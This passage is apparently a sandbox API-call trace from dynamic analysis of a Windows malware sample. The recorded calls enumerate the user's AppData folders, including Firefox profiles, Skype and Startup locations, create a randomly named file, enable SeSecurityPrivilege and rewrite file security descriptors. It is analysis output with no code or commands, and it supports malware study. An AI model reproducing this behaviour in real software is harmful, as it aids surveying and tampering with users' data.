returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0083.239] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.240] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0083.240] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0083.240] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.241] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="Accessibility" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility" [0083.241] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0083.241] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.242] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.242] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="System Tools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools" [0083.242] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0083.242] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.243] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.243] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.244] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0083.244] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0083.244] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.244] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.244] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0083.244] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0083.244] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.244] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.244] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0083.244] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0083.244] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.245] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.245] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.245] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.245] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0083.245] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0083.245] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.245] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.245] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0083.245] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0083.245] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.246] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.246] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.246] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Word" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word" [0083.246] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*" [0083.246] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.246] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word", pszFile="STARTUP" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0083.246] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0083.246] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.246] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.246] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.246] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.247] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.247] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.247] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.247] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Extensions" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions" [0083.247] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0083.247] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.247] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.247] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="Firefox" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox" [0083.247] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0083.247] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.247] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Crash Reports" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0083.247] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0083.247] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.248] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.248] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox", pszFile="Profiles" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0083.248] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0083.248] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.248] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.250] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.251] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.251] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.252] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.252] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.252] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.253] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x18c2b0 | out: lpFindFileData=0x18c2b0) returned 0x586ce0 [0083.254] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*", lpFindFileData=0x18be28 | out: lpFindFileData=0x18be28) returned 0x586d20 [0083.254] FindClose (in: hFindFile=0x586d20 | out: hFindFile=0x586d20) returned 1 [0083.254] FindClose (in: hFindFile=0x586ce0 | out: hFindFile=0x586ce0) returned 1 [0083.254] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.254] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.254] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.255] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.255] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.255] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\changes\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.255] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.255] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\failed\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.256] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.256] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\weave\\toFetch\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.256] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.256] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.256] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.256] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.256] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.256] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.256] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.256] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.256] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.257] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Skype\\RootTools\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.257] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.257] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.257] FindClose (in: hFindFile=0x586b20 | out: hFindFile=0x586b20) returned 1 [0083.257] PathFindExtensionW (pszPath="SJpF7mOw3gFdA.m4a") returned=".m4a" [0083.257] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x148 [0083.257] CloseHandle (hObject=0x148) returned 1 [0083.258] GetCurrentThread () returned 0xfffffffe [0083.258] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x18e6c4 | out: TokenHandle=0x18e6c4*=0x0) returned 0 [0083.258] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x18e6c4 | out: TokenHandle=0x18e6c4*=0x148) returned 1 [0083.258] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x18e6b8 | out: lpLuid=0x18e6b8*(LowPart=0x8, HighPart=0)) returned 1 [0083.258] AdjustTokenPrivileges (in: TokenHandle=0x148, DisableAllPrivileges=0, NewState=0x18e6b4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0083.258] GetLastError () returned 0x514 [0083.258] CloseHandle (hObject=0x148) returned 1 [0083.258] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0083.259] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x57c8d8, lpbSaclPresent=0x18e6dc, pSacl=0x18e6e8, lpbSaclDefaulted=0x18e6e0 | out: lpbSaclPresent=0x18e6dc, pSacl=0x18e6e8, lpbSaclDefaulted=0x18e6e0) returned 1 [0083.259] SetNamedSecurityInfoW () returned 0x0 [0083.384] LocalFree (hMem=0x57c8d8) returned 0x0 [0083.384] GetNamedSecurityInfoW () returned 0x0 [0083.385] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18e6a8, nSubAuthorityCount=0x2, nSubAuthority0=0x2, nSubAuthority1=0x1, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18e6b8 | out: pSid=0x18e6b8*=0x585d20*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xf), SubAuthority=([0]=0x2, [1]=0x0))) returned 1 [0083.385] SetEntriesInAclW () returned 0x0 [0083.385] SetNamedSecurityInfoW () returned 0x0 [0083.386] LocalFree (hMem=0x5858d8) returned 0x0 [0083.386] LocalFree (hMem=0x585b00) returned 0x0 [0083.386] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0083.386] GetNamedSecurityInfoW () returned 0x0 [0083.386] LocalFree (hMem=0x572028) returned 0x0 [0083.386] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpSrch="microsoft") returned 0x0 [0083.386] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpSrch="firefox") returned 0x0 [0083.386] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*" [0083.386] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\*", lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 0x586b20 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e4a0 | out: lpFindFileData=0x18e4a0) returned 1 [0083.386] PathCombineW (in: pszDest=0x18e298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Adobe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe" [0083.386] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned 0 [0083.386] GetNamedSecurityInfoW () returned 0x0 [0083.387] LocalFree (hMem=0x571fe8) returned 0x0 [0083.387] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0083.387] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0083.387] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.387] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b60 [0083.387] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.387] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.387] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") 